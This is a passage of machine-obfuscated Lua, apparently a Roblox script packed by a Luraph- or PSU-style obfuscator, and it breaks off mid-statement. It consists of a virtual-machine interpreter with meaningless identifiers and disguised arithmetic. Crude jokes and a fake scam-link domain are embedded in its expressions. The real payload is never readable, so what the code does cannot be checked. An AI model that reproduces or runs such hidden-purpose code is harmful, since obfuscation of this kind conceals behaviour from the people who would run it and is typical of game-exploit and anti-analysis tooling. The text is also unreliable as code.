😃😆😉😁😁😄😇😃😅😀🤪😀🤣🤪😃😝🙂😇😃😊😉😉😁🙃😇🙂😅😂🤪🙃😂😅😀😆🙃😁😄😄😊😃😆😀😝😃😅🤪🤪🤪😂😇😀😊🙃😉😄🙃😊🙂😆😂😝😂🤣😅😜😆🙂😁😃😄😉😃😁😀😊😜😆🤪😝🤪🤣😇");local __l_l=(25990/0xe6)local _l=74 local __=_ll;local _={}_={[(21-0x14)]=function()local _l_,_ll,_,___=_ll_ll(__l_ll,__,__+____l);__=__+_____;_l=(_l+(__l_l*_____))%__l;return(((___+_l-(__l_l)+__l_*(_____*_l___))%__l_)*((_l___*_l__ll)^_l___))+(((_+_l-(__l_l*_l___)+__l_*(_l___^____l))%__l)*(__l_*__l))+(((_ll+_l-(__l_l*____l)+_l__ll)%__l)*__l_)+((_l_+_l-(__l_l*_____)+_l__ll)%__l);end,[(0x82-128)]=function(_,_,_)local _=_ll_ll(__l_ll,__,__);__=__+_l__l;_l=(_l+(__l_l))%__l;return((_+_l-(__l_l)+_l__ll)%__l_);end,[(62-0x3b)]=function()local _,_ll=_ll_ll(__l_ll,__,__+_l___);_l=(_l+(__l_l*_l___))%__l;__=__+_l___;return(((_ll+_l-(__l_l)+__l_*(_l___*_____))%__l_)*__l)+((_+_l-(__l_l*_l___)+__l*(_l___^____l))%__l_);end,[(-#"totally obfuscated with luraph"+(((-0x3b+202)+-#[[v3 has it]])+-100))]=function(_l,_,__)if __ then local _=(_l/_l___^(_-_ll))%_l___^((__-_l__l)-(_-_ll)+_l__l);return _-_%_ll;else local _=_l___^(_-_l__l);return(_l%(_+_)>=_)and _ll or _lllll;end;end,[(0x77+-114)]=function()local _l=_[(-0x53+84)]();local __=_[(95+(-0x1dbe/81))]();local ___=_ll;local _l_=(_[(90-0x56)](__,_l__l,___lll+_____)*(_l___^(___lll*_l___)))+_l;local _l=_[(41-0x25)](__,21,31);local _=((-_ll)^_[(78-0x4a)](__,32));if(_l==_lllll)then if(_l_==__llll)then return _*_lllll;else _l=_l__l;___=__llll;end;elseif(_l==(__l_*(_l___^____l))-_l__l)then return(_l_==_lllll)and(_*(_l__l/__llll))or(_*(_lllll/__llll));end;return _l___l(_,_l-((__l*(_____))-_ll))*(___+(_l_/(_l___^_ll__l)));end,[(((1086+-0x15)+-#[[i know what sex is, but i wont tell you]])/0xab)]=function(_l_,___,___)local ___;if(not _l_)then _l_=_[(114+-0x71)]();if(_l_==_lllll)then return'';end;end;___=__ll_l(__l_ll,__,__+_l_-_ll);__=__+_l_;local _=''for __=_l__l,#___ do _=_l_l_l(_,____ll((_ll_ll(__ll_l(___,__,__))+_l)%__l))_l=(_l+__l_l)%__l_ end return _;end}local function __l_l(...)return{...},_lll_l('#',...)end local function __ll_l()local _lll={};local _l_={};local _l={};local _l_l={_lll,_l_,nil,_l};local __={}local ___l=(88+-#{49,kernel32dII,kernel32dII,(function()return('1IlC8R'):find("\16")end)()})local __l={[(-70+(0xfb-181))]=(function(_l)return not(#_l==_[(376/0xbc)]())end),[(0x3f+(-#'I am albanian obfuscator I cannot hide this script please dont view it'+(0x2d+-36)))]=(function(_l)return _[((0x50a/((252-0xac)+-#[[localplayer not working on server scripts pls help]]))+-#"You know c#? What does << operator do?")]()end),[(0x72/(-0x48+110))]=(function(_l)return _[((0xc7-153)+-#'You know math? sqrt(-2) * sqrt(-32) = ??')]()end),[(164/0x29)]=(function(_l)local _ll=_[((0x5a/9)+-#[[real]])]()local _=''local _l=1 for __=1,#_ll do _l=(_l+___l)%__l _=_l_l_l(_,____ll((_ll_ll(_ll:sub(__,__))+_l)%__l_))end return _ end)};local _l=_[(0x1f-(1170/0x27))]()for _l=1,_l do local _=_[(0x37-53)]();local _ll;local _=__l[_%((0xa3+-41)+-#'guys why isnt localplayer working on server scripts please help i am noob')];__[_l]=_ and _({});end;for _l_=1,_[(-#"Bye bye :wave:"+(0x92-131))]()do local _l=_[((414/0x17)+-#"balls in ur jawz")]();if(_[(-127+0x83)](_l,_ll,_l__l)==__llll)then local _l_l=_[(-#[[starmcommunity.ru/scamlink]]+(77-0x2f))](_l,_l___,____l);local __l=_[((295-0xc5)-94)](_l,_____,_l___+_____);local _l={_[((-0x5e+75)+22)](),_[(54-(0x132/6))](),nil,nil};local ___l={[((0x83+-90)+-#[[Penis Sucking Utilities source leak lol!!]])]=function()_l[___ll]=_[(0x5d/31)]();_l[___l_]=_[((169-0x7a)+-#"when is federal going to meet memcorrupt irl")]();end,[(-#'oh oh i will hack you =opens dev console='+(129-0x57))]=function()_l[____]=_[(0xa5/165)]();end,[(0x63-97)]=function()_l[__ll]=_[(27+-0x1a)]()-(_l___^___lll)end,[(-#'steancommunityru.ru/scamlinkhere'+(0xb7-148))]=function()_l[____]=_[(0x80-127)]()-(_l___^___lll)_l[__l__]=_[((5359/0xe9)+-#[[brick luke deez nuts]])]();end};___l[_l_l]();if(_[(-0x27+43)](__l,_l__l,_ll)==_l__l)then _l[___]=__[_l[_ll_l]]end if(_[(0x66-98)](__l,_l___,_l___)==_ll)then _l[____]=__[_l[__ll]]end if(_[(-0x76+122)](__l,____l,____l)==_l__l)then _l[__l__]=__[_l[_lll_]]end _lll[_l_]=_l;end end;for _=_l__l,_[(30/0x1e)]()do _l_[_-_l__l]=__ll_l();end;_l_l[3]=_[((50-0x25)+-#"moonsec top")]();return _l_l;end;local function ___lll(_,_____,__l_)local _ll_ll=_[_l___];local _l=_[____l];local __=_[_ll];return(function(...)local _=_ll _*=-1 local ____l=_;local __l_ll={};local _lllll=__l_l local __llll={};local __l=__;local __l_l=_l;local _l=_ll;local ____ll={...};local __={};local _l__ll=_ll_ll;local _ll_ll=_lll_l('#',...)-_l__l;for _=0,_ll_ll do if(_>=__l_l)then __llll[_-__l_l]=____ll[_+_l__l];else __[_]=____ll[_+_ll];end;end;local _ll_ll=_ll_ll-__l_l+_ll local _;local __l_l;while true do _=__l[_l];__l_l=_[(124-0x7b)];_l_=(864864)while __l_l<=(-0x7f+250)do _l_-= _l_ _l_=(9136522)while((121+(-0x1ed0/232))+-#"starmcommunity.ru/scamlink")>=__l_l do _l_-= _l_ _l_=(5236749)while(((-94+0xb5)+-#"deez nuts")-48)>=__l_l do _l_-= _l_ _l_=(183726)while(-108+(-#[[psu anti dump !]]+(-0x7e+263)))>=__l_l do _l_-= _l_ _l_=(3901821)while((90+-0x50)+-#'real')>=__l_l do _l_-= _l_ _l_=(2771458)while(-#[[Oh so you know C++? What does sizeof(int) equal to? (gcc)]]+(-0x6b+166))>=__l_l do _l_-= _l_ _l_=(13520520)while(-#[[give access to functions for boosters]]+(0xc9-164))>=__l_l do _l_-= _l_ do return end;break;end while 3510==(_l_)/((0xf5b+-79))do _l_=(542890)while(0xef/239)<__l_l do _l_-= _l_ local _l_;__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];break end while(_l_)/((0x10b96/147))==1165 do local _l_;__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];break end;break;end break;end while(_l_)/((525758/0xc7))==1049 do _l_=(4528650)while __l_l<=(0x42-62)do _l_-= _l_ _l_=(12351975)while __l_l>(6/0x2)do _l_-= _l_ if __[_[_l__]]then _l=_l+_ll;else _l=_[____];end;break end while 3147==(_l_)/((-#[[Broo u/thatHEXdude slapped this server]]+(0x31581/51)))do if(__[_[_lll]]==__[_[_l_l_]])then _l=_l+_l__l;else _l=_[___ll];end;break end;break;end while(_l_)/((754110/0xbd))==1135 do _l_=(5661528)while(1015/0xcb)<__l_l do _l_-= _l_ __[_[___]]=__[_[__ll]]-__[_[__l__]];break end while 2252==(_l_)/((-58+0xa0c))do if(__[_[_lll]]~=__[_[__l__]])then _l=_l+_l__l;else _l=_[_llll];end;break end;break;end break;end break;end while 1463==(_l_)/((-0x57+2754))do _l_=(1913184)while __l_l<=(0x82+-120)do _l_-= _l_ _l_=(4977768)while(0x37-47)>=__l_l do _l_-= _l_ _l_=(5982272)while __l_l>(0x348/120)do _l_-= _l_ local _l_l_;local __llll,_l___;local __l_l;local _l_;__[_[___l]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_____[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][_[_llll]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___l]]={};_l=_l+_ll;_=__l[_l];__[_[___]][_[_l_ll]]=_[_lll_];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[_llll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[____]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[____]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[___]__llll,_l___=_lllll(__[_l_](__[_l_+_l__l]))____l=_l___+_l_-_ll _l_l_=0;for _=_l_,____l do _l_l_=_l_l_+_ll;__[_]=__llll[_l_l_];end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]][_[_llll]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];do return end;break end while(_l_)/(((17760/0xa)+-#[[sexy]]))==3376 do local ___;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_l__];___=__[_[___ll]];__[_l_+1]=___;__[_l_]=___[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];break end;break;end while 1732==(_l_)/(((103528+-0x40)/36))do _l_=(4241010)while(-29+(0xcc4/86))<__l_l do _l_-= _l_ __[_[_ll_]]=__[_[__lll]]%_[__ll_];break end while 1137==(_l_)/((-#"oh oh i will hack you =opens dev console="+(0x2e086/50)))do local _l_l;local ____;local ___l;local _l_;__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___l=__[_[__ll]];__[_l_+1]=___l;__[_l_]=___l[_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[___]____={__[_l_](__[_l_+1])};_l_l=0;for _=_l_,_[_ll__]do _l_l=_l_l+_ll;__[_]=____[_l_l];end _l=_l+_ll;_=__l[_l];_l=_[___ll];break end;break;end break;end while 511==(_l_)/((7594-0xf0a))do _l_=(5578083)while((0xabe/110)+-#[[mer trolled u]])>=__l_l do _l_-= _l_ _l_=(4990928)while __l_l>(-87+0x62)do _l_-= _l_ local _=_[_ll_];____l=_+_ll_ll-1;for _l=_,____l do local _=__llll[_l-_];__[_l]=_;end;break end while(_l_)/((0x13b4-2556))==2006 do local _=_[_lll]local __l,_l=_lllll(__[_](_l_l(__,_+_ll,____l)))____l=_l+_-_l__l local _l=0;for _=_,____l do _l=_l+_ll;__[_]=__l[_l];end;break end;break;end while(_l_)/((-0x22+2427))==2331 do _l_=(2825108)while(0x38-43)<__l_l do _l_-= _l_ local _l_;__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[___ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]={};_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[__lll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[_l_ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[_l_ll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[____]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[____]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[___ll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_llll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[____]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[_llll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))break end while(_l_)/((3229+-0x53))==898 do local _l_;__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if not __[_[_ll_]]then _l=_l+_l__l;else _l=_[__ll];end;break end;break;end break;end break;end break;end while(_l_)/((767/0xd))==3114 do _l_=(553392)while(-17+0x27)>=__l_l do _l_-= _l_ _l_=(8117184)while(2142/0x77)>=__l_l do _l_-= _l_ _l_=(303204)while __l_l<=(0xd40/212)do _l_-= _l_ _l_=(1024752)while __l_l>(155-0x8c)do _l_-= _l_ local _llll;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];_llll=__[_[__lll]];__[_l_+1]=_llll;__[_l_]=_llll[__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=(_[__ll]~=0);break end while(_l_)/((1191-0x266))==1776 do local _={__,_};_[_l__l][_[_l___][___]]=_[_ll][_[_l___][__ll_]]+_[_l__l][_[_l___][___ll]];break end;break;end while(_l_)/(((15540/0x69)+-#'bite this onions'))==2297 do _l_=(8709876)while(-#[[psu more like psshit hahahaha laugh at my joke everyone]]+(0x43c8/241))<__l_l do _l_-= _l_ _l=_[__ll];break end while 2529==(_l_)/((6906-0xd86))do do return __[_[_l__]]end break end;break;end break;end while 3786==(_l_)/((0x10e3-2179))do _l_=(330444)while __l_l<=(4280/0xd6)do _l_-= _l_ _l_=(8907209)while __l_l>(4484/0xec)do _l_-= _l_ local _ll_;local _l_;_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];_ll_=__[_[___ll]];__[_l_+1]=_ll_;__[_l_]=_ll_[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];break end while 3649==(_l_)/((-0x48+2513))do local _l_;__[_[_lll]]();_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[___ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];if(__[_[_ll_]]==_[__ll_])then _l=_l+_l__l;else _l=_[_l_ll];end;break end;break;end while 268==(_l_)/((0x531+-96))do _l_=(790076)while(4200/0xc8)<__l_l do _l_-= _l_ local _ll=__[_[___l_]];if not _ll then _l=_l+_l__l;else __[_[___l]]=_ll;_l=_[____];end;break end while(_l_)/((-#[[troll the teibal]]+(0x216-315)))==3892 do local _=_[_ll_l]__[_](__[_+_l__l])break end;break;end break;end break;end while(_l_)/(((0xc61-1635)+-#"I am albanian obfuscator I cannot hide this script please dont view it"))==378 do _l_=(2295408)while(128+-0x66)>=__l_l do _l_-= _l_ _l_=(15447720)while __l_l<=((-0x20+70)+-#'Bye bye :wave:')do _l_-= _l_ _l_=(1989172)while __l_l>(-#'you have failed the script logging speedrun'+(0x1776/91))do _l_-= _l_ local _ll=_[___l];local _l_=__[_ll+2];local __l=__[_ll]+_l_;__[_ll]=__l;if(_l_>0)then if(__l<=__[_ll+1])then _l=_[_llll];__[_ll+3]=__l;end elseif(__l>=__[_ll+1])then _l=_[_l_ll];__[_ll+3]=__l;end break end while 2036==(_l_)/((-#"Logue Rineage"+(137610/0x8b)))do __[_[___]]=_[__lll];break end;break;end while 3860==(_l_)/((-#'federal is an asshole'+(8172-0x1035)))do _l_=(5661495)while(0x62-73)<__l_l do _l_-= _l_ if(__[_[___l]]<=_[___l_])then _l=_l+_l__l;else _l=_[__lll];end;break end while(_l_)/((-#'real'+(196098/0x62)))==2835 do local 